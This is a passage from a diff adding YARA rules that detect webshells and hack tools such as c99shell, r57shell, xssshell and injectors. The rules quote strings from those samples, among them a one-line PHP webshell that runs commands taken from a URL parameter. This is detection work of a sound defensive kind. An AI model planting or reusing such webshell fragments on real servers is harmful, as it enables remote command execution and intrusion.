+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "if( !getRequest(COMMANDS_URL + \"?v=\" + VICTIM + \"&r=\" + generateID(), \"pushComma" 
+   condition: 
+      all of them
+}
+
+rule Webshell_FeliksPack3___PHP_Shells_usr_RID353E : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Webshells Auto-generated - file usr.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-07 16:04:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "<?php $id_info = array('notify' => 'off','sub' => 'aasd','s_name' => 'nurullahor" 
+   condition: 
+      all of them
+}
+
+rule Webshell_FSO_s_phpinj_RID2F48 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Webshells Auto-generated - file phpinj.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-07 11:50:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s4 = "echo '<a href='.$expurl.'> Click Here to Exploit </a> <br />';" 
+   condition: 
+      all of them
+}
+
+rule Webshell_xssshell_db_RID2F41 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Webshells Auto-generated - file db.asp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-07 11:49:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s8 = "'// By Ferruh Mavituna | http://ferruh.mavituna.com" 
+   condition: 
+      all of them
+}
+
+rule Webshell_PHP_sh_RID2CC8 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Webshells Auto-generated - file sh.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-07 10:03:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "\"@$SERVER_NAME \".exec(\"pwd\")" 
+   condition: 
+      all of them
+}
+
+rule Webshell_xssshell_default_RID3160 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Webshells Auto-generated - file default.asp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-07 13:19:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s3 = "If ProxyData <> \"\" Then ProxyData = Replace(ProxyData, DATA_SEPERATOR, \"<br />\")" 
+   condition: 
+      all of them
+}
+
+rule HKTL_EditServer_2_RID2D31 : DEMO HKTL T1100 WEBSHELL {
+   meta:
+      description = "Webshells Auto-generated - file EditServer.exe"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-07 10:21:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, HKTL, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "@HOTMAIL.COM" 
+      $s1 = "Press Any Ke" 
+      $s3 = "glish MenuZ" 
+   condition: 
+      all of them
+}
+
+rule HKTL_by064cli_RID2B50 : DEMO HKTL T1100 WEBSHELL {
+   meta:
+      description = "Webshells Auto-generated - file by064cli.exe"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-07 09:01:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, HKTL, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s7 = "packet dropped,redirecting" 
+      $s9 = "input the password(the default one is 'by')" 
+   condition: 
+      all of them
+}
+
+rule HKTL_Mithril_dllTest_RID2EB7 : DEMO HKTL T1100 WEBSHELL {
+   meta:
+      description = "Webshells Auto-generated - file dllTest.dll"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-07 11:26:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, HKTL, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "please enter the password:" 
+      $s3 = "\\dllTest.pdb" 
+   condition: 
+      all of them
+}
+
+rule HKTL_peek_a_boo_RID2CA7 : DEMO HKTL T1100 WEBSHELL {
+   meta:
+      description = "Webshells Auto-generated - file peek-a-boo.exe"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-07 09:58:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, HKTL, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "__vbaHresultCheckObj" 
+      $s1 = "\\VB\\VB5.OLB" 
+      $s2 = "capGetDriverDescriptionA" 
+      $s3 = "__vbaExceptHandler" 
+      $s4 = "EVENT_SINK_Release" 
+      $s8 = "__vbaErrorOverflow" 
+   condition: 
+      all of them
+}
+
+rule Webshell_fmlibraryv3_RID2F17 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Webshells Auto-generated - file fmlibraryv3.asp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-07 11:42:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s3 = "ExeNewRs.CommandText = \"UPDATE \" & tablename & \" SET \" & ExeNewRsValues & \" WHER" 
+   condition: 
+      all of them
+}
+
+rule HKTL_Debug_dllTest_2_RID2E56 : DEMO HKTL T1100 WEBSHELL {
+   meta:
+      description = "Webshells Auto-generated - file dllTest.dll"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-07 11:10:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, HKTL, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s4 = "\\Debug\\dllTest.pdb" 
+      $s5 = "--list the services in the computer" 
+   condition: 
+      all of them
+}
+
+rule Webshell_connector_ASP_RID2FB4 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Webshells Auto-generated - file connector.asp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-07 12:08:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s2 = "If ( AttackID = BROADCAST_ATTACK )" 
+      $s4 = "Add UNIQUE ID for victims / zombies" 
+   condition: 
+      all of them
+}
+
+rule HKTL_shelltools_g0t_root_HideRun_RID3387 : DEMO HKTL T1100 WEBSHELL {
+   meta:
+      description = "Webshells Auto-generated - file HideRun.exe"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-07 14:51:41"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, HKTL, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "Usage -- hiderun [AppName]" 
+      $s7 = "PVAX SW, Alexey A. Popoff, Moscow, 1997." 
+   condition: 
+      all of them
+}
+
+rule Webshell_PHP_Shell_v1_7_RID2F81 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Webshells Auto-generated - file PHP_Shell_v1.7.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-07 12:00:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s8 = "<title>[ADDITINAL TITTLE]-phpShell by:[YOURNAME]" 
+   condition: 
+      all of them
+}
+
+rule Webshell_xssshell_save_RID302A : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Webshells Auto-generated - file save.asp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-07 12:28:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s4 = "RawCommand = Command & COMMAND_SEPERATOR & Param & COMMAND_SEPERATOR & AttackID" 
+      $s5 = "VictimID = fm_NStr(Victims(i))" 
+   condition: 
+      all of them
+}
+
+rule Webshell_FSO_s_phpinj_2_RID2FD9 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Webshells Auto-generated - file phpinj.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-07 12:14:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s9 = "<? system(\\$_GET[cpc]);exit; ?>' ,0 ,0 ,0 ,0 INTO" 
+   condition: 
+      all of them
+}
+
+rule Webshell_FSO_s_ajan_RID2E59 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Webshells Auto-generated - file ajan.asp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-07 11:10:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s4 = "entrika.write \"BinaryStream.SaveToFile" 
+   condition: 
+      all of them
+}
+
+rule Webshell_c99shell_RID2D93 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Webshells Auto-generated - file c99shell.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-07 10:37:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "<br />Input&nbsp;URL:&nbsp;&lt;input&nbsp;name=\\\"uploadurl\\\"&nbsp;type=\\\"text\\\"&" 
+   condition: 
+      all of them
+}
+
+rule Webshell_phpspy_2005_full_RID3082 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Webshells Auto-generated - file phpspy_2005_full.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-07 12:42:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s7 = "echo \"  <td align=\\\"center\\\" nowrap valign=\\\"top\\\"><a href=\\\"?downfile=\".urlenco" 
+   condition: 
+      all of them
+}
+
+rule Webshell_FSO_s_zehir4_2_RID2FA6 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Webshells Auto-generated - file zehir4.asp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-07 12:06:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s4 = "\"Program Files\\Serv-u\\Serv" 
+   condition: 
+      all of them
+}
+
+rule Webshell_FSO_s_indexer_2_RID303F : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Webshells Auto-generated - file indexer.asp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-07 12:31:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s5 = "<td>Nerden :<td><input type=\"text\" name=\"nerden\" size=25 value=index.html></td>" 
+   condition: 
+      all of them
+}
+
+rule Webshell_HYTop_DevPack_2005_RID309D : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Webshells Auto-generated - file 2005.asp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-07 12:47:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s7 = "theHref=encodeForUrl(mid(replace(lcase(list.path),lcase(server.mapPath(\"/\")),\"\")" 
+      $s8 = "scrollbar-darkshadow-color:#9C9CD3;" 
+      $s9 = "scrollbar-face-color:#E4E4F3;" 
+   condition: 
+      all of them
+}
+
+rule HKTL_root_040_zip_Folder_deploy_RID32B3 : DEMO HKTL T1100 WEBSHELL {
+   meta:
+      description = "Webshells Auto-generated - file deploy.exe"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-07 14:16:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, HKTL, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s5 = "halon synscan 127.0.0.1 1-65536" 
+      $s8 = "Obviously you replace the ip address with that of the target." 
+   condition: 
+      all of them
+}
+
+rule HKTL_by063cli_RID2B4F : DEMO HKTL T1100 WEBSHELL {
+   meta:
+      description = "Webshells Auto-generated - file by063cli.exe"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-07 09:01:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, HKTL, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s2 = "#popmsghello,are you all right?" 
+      $s4 = "connect failed,check your network and remote ip." 
+   condition: 
+      all of them
+}
+
+rule HKTL_byshell063_ntboot_2_RID2FB5 : DEMO HKTL T1100 WEBSHELL {
+   meta:
+      description = "Webshells Auto-generated - file ntboot.dll"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-07 12:08:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, HKTL, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s6 = "OK,job was done,cuz we have localsystem & SE_DEBUG_NAME:)" 
+   condition: 
+      all of them
+}
+
+rule HKTL_u_uay_RID2AC6 : DEMO HKTL T1050 T1100 WEBSHELL {
+   meta:
+      description = "Webshells Auto-generated - file uay.exe"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-07 08:21:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, HKTL, T1050, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "exec \"c:\\WINDOWS\\System32\\freecell.exe" 
+      $s9 = "SYSTEM\\CurrentControlSet\\Services\\uay.sys\\Security" 
+   condition: 
+      1 of them
+}
+
+rule HKTL_pwreveal_RID2C09 : DEMO HKTL T1100 WEBSHELL {
+   meta:
+      description = "Webshells Auto-generated - file pwreveal.exe"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-07 09:32:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, HKTL, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "*<Blank - no es" 
+      $s3 = "JDiamondCS " 
+      $s8 = "sword set> [Leith=0 bytes]" 
+      $s9 = "ION\\System\\Floating-" 
+   condition: 
+      all of them
+}
+
+rule HKTL_vanquish_2_RID2CA3 : DEMO HKTL T1100 WEBSHELL {
+   meta:
+      description = "Webshells Auto-generated - file vanquish.exe"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-07 09:57:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, HKTL, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s2 = "Vanquish - DLL injection failed:" 
+   condition: 
+      all of them
+}
+
+rule Webshell_down_rar_Folder_down_RID32D4 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Webshells Auto-generated - file down.asp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-07 14:21:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "response.write \"<font color=blue size=2>NetBios Name: \\\\\"  & Snet.ComputerName &" 
+   condition: 
+      all of them
+}
+
+rule Webshell_cmdShell_ASP_RID2F15 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Webshells Auto-generated - file cmdShell.asp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-07 11:42:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "if cmdPath=\"wscriptShell\" then" 
+   condition: 
+      all of them
+}
+
+rule HKTL_portlessinst_RID2DDD : DEMO HKTL T1100 WEBSHELL {
+   meta:
+      description = "Webshells Auto-generated - file portlessinst.exe"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-07 10:50:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, HKTL, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s2 = "Fail To Open Registry" 
+      $s3 = "f<-WLEggDr\"" 
+      $s6 = "oMemoryCreateP" 
+   condition: 
+      all of them
+}
+
+rule HKTL_SetupBDoor_RID2C8A : DEMO HKTL T1100 WEBSHELL {
+   meta:
+      description = "Webshells Auto-generated - file SetupBDoor.exe"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-07 09:53:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, HKTL, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "\\BDoor\\SetupBDoor" 
+   condition: 
+      all of them
+}
+
+rule Webshell_phpshell_3_RID2E98 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Webshells Auto-generated - file phpshell.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-07 11:21:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s3 = "<input name=\"submit_btn\" type=\"submit\" value=\"Execute Command\"></p>" 
+      $s5 = "      echo \"<option value=\\\"$work_dir\\\" selected>Current Directory</option>\\n\";" 
+   condition: 
+      all of them
+}
+
+rule HKTL_BIN_Server_RID2C52 : DEMO HKTL T1100 WEBSHELL {
+   meta:
+      description = "Webshells Auto-generated - file Server.exe"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-07 09:44:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, HKTL, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "configserver" 
+      $s1 = "GetLogicalDrives" 
+      $s2 = "WinExec" 
+      $s4 = "fxftest" 
+      $s5 = "upfileok" 
+      $s7 = "upfileer" 
+   condition: 
+      all of them
+}
+
+rule Webshell_HYTop2006_rar_Folder_2006_RID32C8 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Webshells Auto-generated - file 2006.asp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-07 14:19:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s6 = "strBackDoor = strBackDoor " 
+   condition: 
+      all of them
+}
+
+rule Webshell_r57shell_3_RID2E2E : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Webshells Auto-generated - file r57shell.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-07 11:03:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "<b>\".$_POST['cmd']" 
+   condition: 
+      all of them
+}
+
+rule Webshell_FSO_s_ajan_2_RID2EEA : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Webshells Auto-generated - file ajan.asp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-07 11:34:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s2 = "\"Set WshShell = CreateObject(\"\"WScript.Shell\"\")" 
+      $s3 = "/file.zip" 
+   condition: 
+      all of them
+}
+
+rule Simple_PHP_BackDooR_RID2E06 : DEMO MAL T1100 WEBSHELL {
+   meta:
+      description = "Webshells Auto-generated - file Simple_PHP_BackDooR_RID2E06.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-07 10:56:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, MAL, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "<hr>to browse go to http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=[directory he" 
+      $s6 = "if(!move_uploaded_file($HTTP_POST_FILES['file_name']['tmp_name'], $dir.$fn" 
+      $s9 = "// a simple php backdoor" 
+   condition: 
+      1 of them
+}
+
+rule Webshell_HYTop_DevPack_2005Red_RID31B8 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Webshells Auto-generated - file 2005Red.asp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-07 13:34:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "scrollbar-darkshadow-color:#FF9DBB;" 
+      $s3 = "echo \"&nbsp;<a href=\"\"/\"&encodeForUrl(theHref,false)&\"\"\" target=_blank>\"&replace" 
+      $s9 = "theHref=mid(replace(lcase(list.path),lcase(server.mapPath(\"/\")),\"\"),2)" 
+   condition: 
+      all of them
+}
+
+rule HKTL_HYTop_CaseSwitch_2005_RID2FEA : DEMO HKTL T1100 WEBSHELL {
+   meta:
+      description = "Webshells Auto-generated - file 2005.exe"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-07 12:17:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, HKTL, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "MSComDlg.CommonDialog" 
+      $s2 = "CommonDialog1" 
+      $s3 = "__vbaExceptHandler" 
+      $s4 = "EVENT_SINK_Release" 
+      $s5 = "EVENT_SINK_AddRef" 
+      $s6 = "By Marcos" 
+      $s7 = "EVENT_SINK_QueryInterface" 
+      $s8 = "MethCallEngine" 
+   condition: 
+      all of them
+}
+
+rule Webshell_FSO_s_RemExp_RID2F10 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Webshells Auto-generated - file RemExp.asp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-07 11:41:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "<td bgcolor=\"<%=BgColor%>\" title=\"<%=SubFolder.Name%>\"> <a href= \"<%=Request.Ser" 
+      $s5 = "<td bgcolor=\"<%=BgColor%>\" title=\"<%=File.Name%>\"> <a href= \"showcode.asp?f=<%=F" 
+      $s6 = "<td bgcolor=\"<%=BgColor%>\" align=\"right\"><%=Attributes(SubFolder.Attributes)%></" 
+   condition: 
+      all of them
+}
+
+rule Webshell_FeliksPack3___PHP_Shells_2005_RID34AB : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Webshells Auto-generated - file 2005.asp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-07 15:40:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "window.open(\"\"&url&\"?id=edit&path=\"+sfile+\"&op=copy&attrib=\"+attrib+\"&dpath=\"+lp" 
+      $s3 = "<input name=\"dbname\" type=\"hidden\" id=\"dbname\" value=\"<%=request(\"dbname\")%>\">" 
+   condition: 
+      all of them
+}
+
+rule HKTL_Mithril_tool_RID2D99 : DEMO HKTL T1100 WEBSHELL {
+   meta:
+      description = "Webshells Auto-generated - file Mithril.exe"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-07 10:38:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, HKTL, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "OpenProcess error!" 
+      $s1 = "WriteProcessMemory error!" 
+      $s4 = "GetProcAddress error!" 
+      $s5 = "HHt`HHt\\" 
+      $s6 = "Cmaudi0" 
+      $s7 = "CreateRemoteThread error!" 
+      $s8 = "Kernel32" 
+      $s9 = "VirtualAllocEx error!" 
+   condition: 
+      all of them
+}
+
+rule HKTL_Release_dllTest_RID2E9F : DEMO HKTL T1100 WEBSHELL {
+   meta:
+      description = "Webshells Auto-generated - file dllTest.dll"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-07 11:22:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, HKTL, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = ";;;Y;`;d;h;l;p;t;x;|;" 
+      $s1 = "0 0&00060K0R0X0f0l0q0w0" 
+      $s2 = ": :$:(:,:0:4:8:D:`=d=" 
+      $s3 = "4@5P5T5\\5T7\\7d7l7t7|7" 
+      $s4 = "1,121>1C1K1Q1X1^1e1k1s1y1" 
+      $s5 = "9 9$9(9,9P9X9\\9`9d9h9l9p9t9x9|9" 
+      $s6 = "0)0O0\\0a0o0\"1E1P1q1" 
+      $s7 = "<.<I<d<h<l<p<t<x<|<" 
+      $s8 = "3&31383>3F3Q3X3`3f3w3|3" 
+      $s9 = "8@;D;H;L;P;T;X;\\;a;9=W=z=" 
+   condition: 
+      all of them
+}
+
+rule HKTL_ZXshell2_0_rar_Folder_zxrecv_RID338E : DEMO HKTL T1100 WEBSHELL {
+   meta:
+      description = "Webshells Auto-generated - file zxrecv.exe"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-07 14:52:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, HKTL, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "RyFlushBuff" 
+      $s1 = "teToWideChar^FiYP" 
+      $s2 = "mdesc+8F D" 
+      $s3 = "\\von76std" 
+      $s4 = "5pur+virtul" 
+      $s5 = "- Kablto io" 
+      $s6 = "ac#f{lowi8a" 
+   condition: 
+      all of them
+}
+
+rule HKTL_HDConfig_RID2B85 : DEMO HKTL T1100 WEBSHELL {
+   meta:
+      description = "Webshells Auto-generated - file HDConfig.exe"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-04-07 09:10:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, HKTL, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "An encryption key is derived from the password hash. " 
+      $s3 = "A hash object has been created. " 
+      $s4 = "Error during CryptCreateHash!" 
+      $s5 = "A new key container has been created." 
+      $s6 = "The password has been added to the hash. " 
+   condition: 
+      all of them
+}
+
+rule WebShell_hiddens_shell_v1_RID30E2 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
